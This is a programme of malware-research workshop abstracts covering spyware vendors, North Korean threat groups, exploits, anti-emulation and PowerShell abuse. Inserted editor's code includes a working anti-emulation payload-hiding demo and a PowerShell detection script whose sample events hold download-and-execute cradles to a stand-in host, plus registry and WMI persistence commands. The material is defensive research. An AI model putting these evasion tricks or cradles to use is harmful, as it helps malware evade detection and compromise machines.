The abstracts are listed in the order of the Workshop program. Changes may be made at any time.
FinFisher x Hacking Team = ?
Filip Kafka (ESET), Bill Marczak, John Scott Railton (CitizenLab)
FinFisher and Hacking Team share a number of similarities: both are organizations infamous for developing surveillance tools sold to governments worldwide. Both have been criticized for not being selective about whom they sell to; their customers are suspected to include oppressive regimes. Both organizations have also been hacked, with sensitive internal files leaking online and confirming some of those suspicions. For these reasons, both organizations and their malware are the subject of research at ESET and CitizenLab. Our respective research findings have revealed that both companies are still active, developing and selling their malicious tools.
Presentations at the Virus Bulletin and AVAR conferences in 2017 detailed technical improvements in the FinFisher toolkit, including a custom virtual machine and a cunning infection vector used to install the spyware on targets' computers: a MitM attack most likely carried out at the ISP level. Later on, the infection technique remained but the malware delivered was switched to StrongPity 2.
We will examine the similarities and differences with CitizenLab's March 2018 findings, which uncovered more details of this attack, and we will present pcaps to support our findings.
Hacking Team's flagship product, Remote Control System (RCS), was detected in the wild in fourteen countries at the beginning of 2018. We will present evidence suggesting that the new post-hack Hacking Team samples can be traced back to a single group. Who is this group, who are their targets, and what is their modus operandi?
SiliVaccine: The Supreme Leader of Anti-Virus Solutions
Mark Lecthik, Michael Kajiloti (Checkpoint)
Meet SiliVaccine – North Korea’s national Anti-Virus solution. SiliVaccine is deployed widely and exclusively in the DPRK, and has been continuously in development by dedicated government teams for over fifteen years. When we heard of this strange software, we were immediately driven to investigate it: it’s not every day that you can catch a glimpse of the malware landscape inside the closed garden of the DPRK’s intranet.
In this talk, we will describe how we were able to obtain a rare copy of the program; how we were able to reverse engineer it; and what surprising discoveries we made about it. We will provide a rare glimpse into the internal workings of this mysterious AV, detailing the program architecture, while highlighting some of its most bizarre & puzzling implementation details.
Taking an in depth look at SiliVaccine’s core components, including the file scanning engine, the system level drivers, and the user mode utilities, allows us to expose what lies behind the scenes, hidden away from the public eye.
At the same time, we will try to uncover the story behind SiliVaccine’s creation, describing the involved entities and the sheer effort that must have gone into developing this product. If there is anything we learned from this research, it’s that DPRK state-sponsored software is a secretive industry full of incredibly shady practices, and that if Kim Jong-Un sends you a free trial of his latest security solution, the correct answer is “thank you but no thank you”.
North Korean defectors and tracking of actors behind
Jaewon Min, Inhee Han (McAfee)
North Korean defectors have been the victims of cyber attacks for many years. In the past, threat actors used Windows as the main platform to deliver malware to defectors, via executable files and office documents, especially Hangul (Korean word processor) files. But the threat actors have gone mobile. We have spotted their mobile operations and tracked what they were doing beneath the surface, hidden from the public eye, to successfully implant malware on defectors' devices.
We will present our analysis of two threat actors that executed mobile malware operations targeting North Korean defectors.
The Lazarus group is one of the most active cybercrime groups. We found this actor's activity in the mobile world. We will explain how we found the activity and what made us realize that it is operated by the Lazarus group: for example, overlapping IP addresses that were used by Lazarus as C2, and code similarities.
A previously unknown group named "Sun Team" has used KakaoTalk and other SNS services to directly approach defectors and send them malware download links. We will explain the internal workings of the malware samples and how they used cloud services as C2 servers. We will also look into what kind of data was extracted from victims' devices and infer who the victims of these operations were.
Furthermore, we will present the artifacts we found from the mobile operation that gave us insight into how they operated under the surface: information gathering, creation of fake accounts, malware development, test device models, data encryption, etc.
Exploiting ActionScript3 interpreter
Anton Ivanov, Boris Larin (Kaspersky Lab)
At the end of 2017 we discovered an Adobe Flash Player zero-day vulnerability (CVE-2017-11292) which was used by the BlackOasis APT. This case demonstrates that Adobe Flash Player is still a good target for threat actors.
CVE-2017-11292 is a particularly interesting type-confusion vulnerability, and there are no public reports describing it.
In this presentation we will present and release our self-made ActionScript3 processor module and debug plugin for IDA Pro. These tools work together to complement each other, and have shown good results in debugging in-the-wild exploits.
We analyzed the AVM and found a way to improve analysis using the rich possibilities of IDA Pro and its API.
In our presentation we will cover the following:
1. The exploitation techniques currently used by threat actors in Flash exploits
2. A detailed description of CVE-2017-11292
3. How to find new vulnerabilities in Adobe Flash Player
4. Our self-made IDA Pro plugins for analysis and debugging of Flash exploits.
The Secret Weapons of Andariel Group
Minseok (Jacky) Cha (Ahnlab)
The Andariel group, also known as Silent Chollima, is one of the subgroups of the notorious Lazarus Group. Unlike other subgroups, this group primarily focuses on South Korean targets, so it is not as well known in other countries. Surprisingly, this attack group has been active in Korea for over 10 years.
Andariel's first attack was on the Korean military in 2007, and it has since expanded its attacks to the private sector, such as its DDoS attack in 2009 and the 3.4 DDoS attack in 2011. Andariel is associated with the 2013 DarkSeoul (3.20 cyber terror) attack and was responsible for Operation Black Mine in 2014, which exploited a vulnerability in an ActiveX control widely used in Korea. After 2015, it stole military secrets by attacking defense companies, large corporations, and military units in Korea. In 2016, however, there was a change in the pattern of attacks from this group, which until then had mainly targeted confidential information. Near the end of 2016 the group distributed malware that let its operators view their opponents' hands in an online gambling game; in 2017 it started attacking the financial industry and also demanded a ransom from a hacked travel agency; and in 2018 it attempted an attack on a cryptocurrency exchange. Judging from the pattern of unpublished attacks, we can see that they are also interested in various public services and ICT companies in Korea.
The main infection vectors of this group are as below:
– Spear phishing emails with macros
– Watering hole attacks that exploit ActiveX vulnerabilities
– Attacks exploiting vulnerabilities in antivirus programs and IT management systems used by Korean companies and institutions
– Supply chain attacks tampering with the update files of systems such as ERP and remote programs
In addition, Andariel is familiar with the vulnerabilities of security programs and central management systems that are widely used in Korea.
Malware analysts investigate malware using information gleaned from its activities, such as its attack target, attack method, malware type, web shell, and C2. Sometimes, however, a malware developer reveals internal information and the tools used for development by mistake, and this becomes key information for malware analysts when profiling the attack group. For example, malware with a Korean UI has a high likelihood of having a developer who is a native or fluent Korean speaker.
In this presentation, I will talk about Andariel's activities from 2016 to 2017, focusing on its main attack targets, infection vectors, malware, and the relation between the code and the attacks. I will also reveal some interesting information about Andariel acquired from an internal tool used by the attackers.
Malware is flying under your radar
Kurt Natvig (Forcepoint)
Sandboxing is often seen as the last line of defence in your cyber security. The standard approach is to first check for known threats, then possible threats, non-compliance with corporate policies and so on. If the object passes all these layers of protection and you're still not sure what you are dealing with, you put it through a sandbox of your choice. The sandbox will try, in any automated way possible, to activate/detonate the unknown object to help you categorize it and work out how bad it is. Sandbox services for malware analysis are not created equal. Even if you use your golden image or real physical hardware, sandboxed applications today require access to unknown services through the Internet. Cybercriminals use this to tap into the virtual environments and record the characteristics of these magical worlds. Sandboxes are too eager to aid and assist, because they want the potential malware to detonate and show its true colours; instead they end up revealing their environments, making it possible for the malware to fly under the radar.
Venturing Into the Unknown: Malware Abuse of Undocumented Instructions
Shiv Chand (K7 Computing)
"…there are things we know we know. We also know there are known unknowns; that is to say we know there are some things we do not know. But there are also unknown unknowns – the ones we don't know we don't know. And if one looks throughout the history of our country and other free countries, it is the latter category that tends to be the difficult ones" – Donald Rumsfeld, ex-US Secretary of Defense, 12/02/2002
Various families of malware have been actively using undocumented x86/x64 Intel instructions for some time now as one more technique in their anti-emulator, anti-debugging and anti-reversing armoury.
The speed of technological advance has meant that chip manufacturers have implemented new advanced instructions before documenting them in their manuals describing the instruction set. Intel’s manual, for example, has been prepared to aid legitimate software developers rather than malware authors who are keen to leverage unknown unknowns to evade detection. Various malware families have been able to successfully exploit the ensuing knowledge gap before support is provided in emulators, debuggers and disassemblers.
This presentation explores undocumented Intel instructions which are and have been actively used by malware. We shall not only segregate such instructions based on the particular malware family using them and their lineage, but also aim to provide rudimentary documentation for each of them based on our research and observations. We shall also aim to provide a framework for identifying, researching and documenting undocumented instructions for other chipsets such as ARM.
CCleaner incident: Attacking the masses to target the few
Jakub Kroustek (AVAST)
On September 18, 2017, the news broke that CCleaner, one of the most popular PC performance optimization tools, had been infected with malware, impacting 2.27 million users. Avast acquired Piriform, the makers of CCleaner, at the time the attack was happening, and this provided the Avast Threat Labs team an opportunity to directly analyze the attack.
We discovered that the incident was a sophisticated APT attack, designed to target select high-profile technology and telecommunications companies. By using a supply-chain attack to gain access to the CCleaner build environment, the threat actors injected malicious code into the product, infecting a routine software update that was distributed to CCleaner users. What's really interesting is that out of the 2.27 million PCs affected, only 40 PCs, ones within those high-profile companies, received a second malicious payload, most likely developed for corporate espionage. There were also indications that this attack may be related to the notorious "Axiom" hacking group out of China.
Jakub Kroustek will present the findings that he and the security experts from the Avast Threat Labs team uncovered during the initial and ongoing investigation. He will share details about the inner workings of the attack and discuss who might be behind the breach. He will also briefly discuss why he believes supply-chain attacks will continue, and what the security community, software companies and enterprises need to consider to help prevent these attacks.
GreyEnergy: Beyond BlackEnergy and NotPetya
Anton Cherepanov, Róbert Lipovský (ESET)
In our CARO 2017 Workshop talk, titled "Rooting out what really happened last December", we introduced Industroyer, the greatest threat to ICS since Stuxnet. We also presented our findings on the operations and toolset of the Telebots APT group (also referred to as Sandworm). We believe this is the same group (or its successor) that was behind the first ever blackout in history caused by a malware-assisted attack, namely the one using BlackEnergy.
In this new talk, we’ll uncover previously undisclosed connections between several APT groups that have been terrorizing critical infrastructure in Ukraine in the past few years but have, in some cases, been active in other countries as well.
Firstly, we will examine the links between the Telebots group and another attack in 2017, which became one of the most damaging cyberattacks in history – the June 2017 ransomware outbreak of NotPetya (also known in the security industry as Petya, ExPetr, Nyetya, EternalPetya). And secondly, we will share previously unpublished details about the NotPetya “cover-up” ransomware, including an early discovered sample which predates the outbreak.
The main focus of the talk will be the introduction of GreyEnergy – a previously unknown malware framework which has been used in attacks against energy companies in Europe, and which we consider to be the successor to BlackEnergy. We will provide a technical analysis of the stealthy modular malware and insight into the tactics, techniques and procedures (TTPs) used by the group behind it.
Not Your Average Prince: Digging into the Nigerian Scam World
Matt Bromiley (Cylance), Courtney Dayter (Kroll)
“Help, I’m a foreign national who has encountered millions of dollars and I need help transferring it!” We’ve all seen the emails – many of us have laughed at them. However, amongst all the silliness is a group of nefarious – and now very wealthy – individuals who still manage to steal millions of dollars. But behind all these attacks are humans – and humans make mistakes. It’s time to reveal these mistakes and put faces to the names.
In this talk, we will examine the various scams that have originated from the Nigerian online crime world, how these scams are conducted, and some of the individuals behind them. Through years of experience investigating and researching these various scams – including Business Email Compromise, Apple scams, Fraudulent Invoices, and the recent surge in Office 365 compromises – we have built up a repertoire of the OPSEC failures that expose the individuals behind the attacks. We have also researched the financial networks utilized by the fraudsters, and how their money moves around the globe.
In our presentation, we will examine the following:
- A technical examination of various attacks originating from the Nigerian online crime world,
- The preferred methods of moving money and financial institutions used by the Nigerian fraudsters,
- OPSEC failures committed by the threat actors that have revealed their true identities, and
- The connections between these individuals that may describe how the attacks are orchestrated.
CARO attendees will receive an unfiltered look into the Nigerian online crime world and the individuals wreaking havoc on bank accounts around the globe. We will be presenting years of research, linkage between individuals and banks, and discussions of how these attacks are perpetrated. Lastly, as we are always seeking to make the world a safer place, we will provide the audience with ideas on protecting against these attacks.
That was close! That was Close! Seeing, Understanding and Changing What Lies Beneath
Adam Shostack
Adam Shostack, Steve Bellovin and collaborators have been exploring what structures we can model on aviation to better learn “what lies beneath” the compromises which plague us, and how we can better expose, understand, and address those root causes. This talk builds on the work Shostack did to push the AutoRun fix to XP and Vista while at Microsoft, and will focus on how to use near-misses to improve our overall knowledge of what goes wrong.
For example, if DNS security measures detect a C2 connection, we could tie that back to a miss by an anti-virus system, or behavioral AV might detect strange C2 connections, missed by DNS. In each case, some controls function as hoped, others do not. Today, we rarely learn from such things for a variety of reasons. This talk will explore those reasons, and suggest both tactical and policy improvements that will help us all defend better.
Evading Detection with Anti-Emulation Techniques
Catalin Valeriu Lita, Doina Cosovan (Scorecard.io)
Anti-malware products started to develop emulators in order to add detection based on behavior, and to get past obfuscated decryption so that they could detect the malware payload after emulating the decryptor code. As a consequence, cybercriminals started to protect their malware samples by developing various anti-emulation techniques.
The most common and basic anti-emulation techniques that emerged are the use of big loops and of rarely used functions. Big loops exhaust the number of instructions an emulator is willing to execute, while rarely used functions are not implemented in emulators and thus cannot be executed by them. Generally, any difference between the real and the emulated environment can be exploited as an anti-emulation technique:
– values returned by particular functions for specific sets of parameters,
– properties of particular files on disk,
– deliverability of window messages,
– the structure of the PEB,
– the implementation of callbacks for TLS, window creation, exceptions,
– mouse movements,
– register values,
– content of the functions to be called.
We will present the evolution of anti-emulation techniques in six malware packers we monitored for updates over the past few years: Bredolab (2009-2010), VIZ (2010-2014), VIZ2 (2013-2015), UPA1 (2013-2015), UPA2 (2015) and UPA3 (2013-2015). In most of the monitored packer evolutions, the packer writers started by testing various advanced anti-emulation techniques in the wild. They began with a combination of techniques and improved them over time; each technique either reached the desired maturity level or was abandoned. In the end they arrived at an efficient combination and settled for that subset of all the techniques they had tried. The reasoning behind this is that they found a small subset which is capable of preventing detection, can be easily updated, and doesn't draw as much attention as would a piece of code full of anti-emulation techniques. The following are some examples of techniques that remained in the chosen subset for various packers: big loops, integrity checks for some executable files on disk, and window messages (such as EM_POSFROMCHAR, EM_SETWORDBREAKPROC, EM_SETEVENTMASK).
Finally, we will present the anti-emulation techniques we discovered in packers used for fresh malware samples from 2018 and compare them to the anti-emulation techniques used a few years ago.
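The following is an added illustration of the "big loop" technique described above; it is not code from the talk or from any of the packers named in it. The loop size, key schedule and payload are constructed for the demo, and the emulator is simulated by an iteration budget rather than a real instruction counter. The point it shows is why the trick works: the XOR key does not exist until the whole loop has run, so an emulator that gives up early never reaches a decrypted payload, and the only useful thing it can do is treat that exhaustion as a signal in its own right.

```python
# Added illustration of the "big loop" anti-emulation technique. Not code from
# the talk or from any real packer; loop size, key schedule and payload are
# constructed for the demo.
LOOP_ITERATIONS = 200_000  # real stubs run far longer: cheap on a CPU, costly to emulate
MASK32 = 0xFFFFFFFF


class BudgetExhausted(Exception):
    """Raised by the simulated emulator when its instruction budget runs out."""


def derive_key(iterations, budget=None):
    """Decryptor stub: the XOR key only exists after the whole loop has run.

    `budget` models an emulator that stops after that many iterations; a real
    emulator counts instructions, but the effect is the same.
    """
    k = 0x9E3779B9
    for i in range(iterations):
        if budget is not None and i >= budget:
            raise BudgetExhausted(i)
        k = ((k ^ i) * 0x01000193) & MASK32   # FNV-style mixing step
        k = ((k << 13) | (k >> 19)) & MASK32  # 32-bit rotate left by 13
    return k.to_bytes(4, "little")


def xor_bytes(data, key):
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


# Constructed stand-in for the packed payload; a real packer wraps code.
PAYLOAD = b"constructed payload: resolve C2, drop stage 2"
PACKED = xor_bytes(PAYLOAD, derive_key(LOOP_ITERATIONS))


def run_stub(packed, budget=None):
    """Execute the unpacking stub.

    Returns ("unpacked", plaintext) on a real CPU or an unbounded emulator, and
    ("budget-exhausted", iterations_done) when the emulator gives up early, in
    which case the scanner never sees the decrypted payload.
    """
    try:
        key = derive_key(LOOP_ITERATIONS, budget)
    except BudgetExhausted as exc:
        return ("budget-exhausted", exc.args[0])
    return ("unpacked", xor_bytes(packed, key))


def emulator_verdict(packed, budget):
    """Defensive side: an emulator that merely stops learns nothing. Recording
    that the sample spent its whole budget in one tight loop before any API
    call, and scoring that, is the usual counter to this trick."""
    state, _ = run_stub(packed, budget)
    return "payload-visible" if state == "unpacked" else "suspicious-loop-exhaustion"


if __name__ == "__main__":
    print(run_stub(PACKED))              # real run: payload recovered
    print(run_stub(PACKED, 10_000))      # budgeted emulator: gives up
    print(emulator_verdict(PACKED, 10_000))
```

Raising the budget defeats this particular stub, which is exactly why packer authors pair the loop with environment checks from the list above (window messages, file integrity) that a longer budget does not fix.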
Is My Smart Home Secure?
Ivan Bešina, Milan Fránik, Miloš Čermák, Kacper Szurek, Juraj Bartko (ESET)
Ever more people are connecting new objects to the Internet of Things, even though the security and privacy protections of many of these devices, or of the services they connect to, have been challenged by researchers in recent years. The abundance of already discovered shortcomings should have given the manufacturers of such devices great feedback and the opportunity to improve the security of forthcoming devices. But have they? We decided to take a look at the current level of security of IoT devices.
We set up a test lab with various “smart” objects typically used in ordinary households. The selected devices were mainly from international companies, but some were from local players in Central Europe. We picked 20 devices that range from smart plugs, bulbs, motion sensors and cameras, to IoT hubs, smart TVs, weight scales and popular personal assistants. During the research we focused on finding vulnerabilities in cloud communication, user-exposed applications and firmware update processes, but also RF communication with peripheral devices and LAN communication, using standard penetration tools and methods.
In half of all tested devices we uncovered at least one minor issue, such as a lack of proper control panel authentication, unencrypted LAN traffic, unnecessary opening of router WAN ports via UPnP, or the possibility to replay RF commands. These alone do not pose major security risks, but combined with other vulnerabilities or bad security practices they can easily be abused by an attacker. Four of the devices had more serious issues. One camera sends its video stream to the cloud with insufficient encryption, leaking private and potentially very sensitive data. By combining a TLS MitM attack and script injection, we were able to alter the firmware of an IoT smart hub, implanting an SSH backdoor. With two other IoT hubs we were able to execute RCE attacks from the internet. By this means we gained full control of these devices and, consequently, over all their connected peripherals, including heating controls, surveillance systems and even electronic locks.
Being able to control our smart homes from anywhere is a very attractive possibility, but such systems and capabilities are equally attractive to attackers, so to keep our privacy intact, the security of IoT is crucial. Our research showed that there are still popular IoT devices in the market that have critical security issues. However there are also manufacturers that can and do produce secure enough devices for the time being, showing that designing secure IoT objects is achievable.
Chadron – Android Dynamic Analysis Sandbox
Vojtech Bocek, Nikolaos Chrysaidos (AVAST)
Chadron is our in-house dynamic analysis sandbox for Android applications capable of method tracing, I/O tracing and machine learning feature extraction. It can also evade detection by apps and contains many optimizations to get the most relevant results possible from the analysis.
The sandbox provides detailed results for manual analysis as well as automated machine learning classification. It is built as a scalable solution that we plugged into our automated sample analysis pipeline and it helps detect samples we would have missed without it.
We’ve also integrated Chadron with other services to form a complete solution for Mobile Threat Intelligence – apk.io. This separate service combines results from dynamic and static analysis, machine learning classifiers, traditional AV and more. It provides much useful information to malware analysts, making it much easier to spot malicious behaviour and link samples together.
While mostly invisible to our customers, Chadron and apk.io have become the most useful tools for our analysts, since dynamic analysis often reveals much more than the usual methods.
In our talk, we would like to describe how we managed to build Chadron, highlight some of the technical difficulties we encountered and present some of the results it provided during its two years of production use.
PowerShell: An Attacker’s Framework of Choice
Pawankumar Chaudhari, Pushkar Ratnaparkhi (Quick Heal)
PowerShell is highly powerful and provides full access to system functions like Windows Management Instrumentation (WMI) and Component Object Model (COM) objects. Attackers are increasingly using PowerShell in their attack methods. The latest Microsoft Windows releases ship with PowerShell by default, and hence it is easy for attackers to abuse victim machines.
Attackers are continuously introducing many advanced techniques through PowerShell, like fileless malware, application whitelisting bypasses and shellcode injection, which are difficult for traditional AV solutions to detect and clean.
We will show how PowerShell is weaponized in attacks observed in the wild, from macro malware to exploits, and then look at the detection mechanisms.
Cybercriminals have also continued to adopt fileless malware leveraging Microsoft PowerShell, which surged over the last year. We will discuss some case studies of malicious scripts hidden inside the registry or Windows Management Instrumentation (WMI) in order to achieve persistence. We will shed light on different lateral movement techniques using PowerShell scripts. Cybercriminals are using these techniques to spread everything from banking Trojans to cryptominers.
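As an added example (not the speakers' detection logic, and not part of the original abstract), the following Python sketch scores the kind of telemetry the talk describes: process command lines with -EncodedCommand, Run-key values and WMI event consumers that carry a PowerShell download/eval cradle. The event lines, indicator regexes and reason labels are all this editor's constructions; the one piece of real PowerShell behaviour it relies on is that -EncodedCommand takes base64 of a UTF-16LE script, so the decoder recovers the script and the indicators are matched against the decoded text as well.

```python
# Added detection sketch for PowerShell abuse patterns (encoded commands,
# download/eval cradles, registry- and WMI-hosted scripts). Events are
# constructed; the indicators are this editor's, not Quick Heal's.
import base64
import re

ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
CRADLE = re.compile(r"\b(?:iex|invoke-expression)\b|downloadstring|frombase64string", re.I)
STEALTH = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop(?:rofile)?\b", re.I)
PERSISTENCE = re.compile(
    r"\\CurrentVersion\\Run\\|CommandLineEventConsumer|ActiveScriptEventConsumer|__EventFilter",
    re.I,
)


def decode_encoded_command(cmdline):
    """Return the script behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from it
        return None


def analyze(event):
    """Return the list of reasons an event is suspicious (empty if none)."""
    reasons = []
    text = event
    decoded = decode_encoded_command(event)
    if decoded is not None:
        reasons.append("encoded command")
        text = event + "\n" + decoded  # match indicators against the decoded script too
    if CRADLE.search(text):
        reasons.append("download/eval cradle")
    if STEALTH.search(text):
        reasons.append("hidden window or no-profile")
    if PERSISTENCE.search(text):
        reasons.append("persistence location")
    return reasons


def _encode(script):
    """Build an -EncodedCommand argument the way PowerShell expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed events in the shape a process/registry/WMI collector would log.
SAMPLE_EVENTS = [
    "powershell.exe -NoP -W Hidden -Enc "
    + _encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')"),
    r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updater = powershell -w hidden -c "
    r'"iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp HKCU:\Software\Vendor).Blob)))"',
    'CommandLineEventConsumer Name=Cleanup CommandLineTemplate="powershell.exe -nop -c '
    '\\"IEX (gwmi -Namespace root\\default -Class Win32_Stash).Payload\\""',
    r"powershell.exe -File C:\scripts\backup.ps1",
]


def scan(events):
    """Map event index -> reasons, for every event that triggered at least one."""
    return {i: r for i, r in ((i, analyze(e)) for i, e in enumerate(events)) if r}


if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_EVENTS).items():
        print(i, reasons)
```

The benign -File invocation at the end produces no reasons, which is the check worth keeping in any such rule: "powershell.exe ran" is not a finding, the combination of hiding, decoding and a persistence location is.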
What Lies Beneath: BLE in GPS trackers
Roman Unuchek (Kaspersky Lab)
I analyzed several GPS trackers with Bluetooth Low Energy capabilities and found major security issues. These trackers use BLE to communicate with the user's phone directly, to preserve battery power, instead of uploading data through the SIM card.
Most of these devices use no authentication, so anyone can connect to them via BLE, not only the owner.
Once connected, they are ready to expose user data to the attacker.
In my presentation, I’ll show what data can be stolen and possible attacks:
– how to trick these trackers and mock their location with fake coordinates
– how to block device communications through other channels
– how to completely break the device
I should mention that not all such devices are vulnerable. Some of them are doing everything right – they have authentication and access control. I’ll describe their techniques to protect user data.
BInsider – automatic signature creation and detection via shared code
Johann Kemper (Avira)
In today's world of easily available crypting services, it is difficult to judge malware based on the root sample. Using generic unpacking or sandbox systems makes it easier to access the code behind these packers, but still leaves a lot of work for the researcher to classify samples and create detection. Additionally, through leaks and "underground" communities, a lot of malicious source code examples make it possible to create powerful malware without any real knowledge of it.
By intelligently disassembling memory dumps while reconstructing the different code functions and their control flow graphs, BInsider takes advantage of this shared code to recognize similar traits between samples and classify them. This presentation will take us through the different technologies I used to create this project and how they enable BInsider to automatically create signatures for a new sample in milliseconds.
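To make the shared-code idea concrete, here is an added, simplified illustration; it is this editor's sketch, not BInsider's algorithm, and the disassembly listings are constructed. Functions are normalized to mnemonic plus operand kind (so addresses and constants changed by a re-crypt still hash identically), a sample becomes the set of its function hashes, and a signature is the set of functions common to every family sample and absent from clean software, which drops shared CRT code out automatically.

```python
# Added illustration of classifying samples by shared code. The normalization,
# hashing and signature rule are this editor's simplification, not BInsider's
# own method; the listings are constructed.
import hashlib


def normalize(instr):
    """Keep the mnemonic and each operand's kind (reg/mem/imm), dropping the
    concrete values so that different addresses, constants or string
    pointers still hash to the same function."""
    mnem, _, ops = instr.partition(" ")
    kinds = []
    for op in (o.strip() for o in ops.split(",") if o.strip()):
        if op.startswith("0x") or op.lstrip("-").isdigit():
            kinds.append("imm")
        elif op.startswith("["):
            kinds.append("mem")
        else:
            kinds.append("reg")
    return mnem + " " + ",".join(kinds)


def function_hash(instrs):
    body = "\n".join(normalize(i) for i in instrs)
    return hashlib.sha256(body.encode()).hexdigest()[:16]


def code_hashes(functions):
    """A sample, as the set of hashes of the functions recovered from its dump."""
    return {function_hash(f) for f in functions}


def similarity(a, b):
    """Jaccard similarity over shared functions."""
    return len(a & b) / len(a | b) if (a | b) else 0.0


def build_signature(family, clean):
    """Functions present in every family sample and absent from all clean
    samples: library code shared with goodware drops out automatically."""
    common = set.intersection(*family)
    return common - set().union(*clean)


def matches(signature, sample, min_fraction=0.5):
    return len(signature & sample) >= min_fraction * len(signature)


# Constructed listings. DECODER_V2 is DECODER rebuilt at another address with
# a different XOR constant, the kind of change a re-crypt introduces.
DECODER = ["push ebp", "mov ebp, esp", "xor ecx, ecx", "mov al, [esi+ecx]",
           "xor al, 0x5A", "mov [edi+ecx], al", "inc ecx", "cmp ecx, 0x40",
           "jl 0x401010", "pop ebp", "ret"]
DECODER_V2 = ["push ebp", "mov ebp, esp", "xor ecx, ecx", "mov al, [esi+ecx]",
              "xor al, 0x7C", "mov [edi+ecx], al", "inc ecx", "cmp ecx, 0x80",
              "jl 0x402230", "pop ebp", "ret"]
BEACON = ["push ebp", "mov ebp, esp", "push 0x403000", "call 0x401500",
          "test eax, eax", "jz 0x401050", "pop ebp", "ret"]
CRT_INIT = ["push ebp", "mov ebp, esp", "call 0x401800", "pop ebp", "ret"]
KEYLOG = ["push ebp", "mov ebp, esp", "push 0x8", "call 0x401900", "pop ebp", "ret"]
WINMAIN = ["push ebp", "mov ebp, esp", "push 0x0", "push 0x403100",
           "call 0x401a00", "pop ebp", "ret"]

MALWARE_A = code_hashes([DECODER, BEACON, CRT_INIT, KEYLOG])
MALWARE_B = code_hashes([DECODER_V2, BEACON, CRT_INIT])
CLEAN = code_hashes([CRT_INIT, WINMAIN])
SIGNATURE = build_signature([MALWARE_A, MALWARE_B], [CLEAN])

if __name__ == "__main__":
    print("A vs B similarity:", similarity(MALWARE_A, MALWARE_B))
    print("signature size:", len(SIGNATURE))
    print("B matches:", matches(SIGNATURE, MALWARE_B), "clean matches:", matches(SIGNATURE, CLEAN))
```

Two caveats a practitioner would add before using anything like this in production: the normalization must not be so loose that tiny prologue-only functions collide across unrelated families (a minimum instruction count helps), and the clean corpus has to be large, since any CRT or compiler helper missing from it will leak into signatures.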